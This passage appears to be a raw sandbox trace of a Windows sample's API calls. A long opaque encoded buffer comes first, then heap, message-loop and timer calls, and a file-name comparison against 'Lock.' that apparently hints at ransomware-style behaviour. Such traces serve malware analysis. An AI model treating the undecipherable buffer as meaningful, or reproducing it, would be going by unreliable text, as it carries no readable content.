\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0263.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.553] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0263.553] TranslateMessage (lpMsg=0x8bf970) returned 0 [0263.553] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0263.553] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0263.553] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0263.553] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0263.553] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.554] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0263.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M4zK0AkB79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.555] CompareStringW 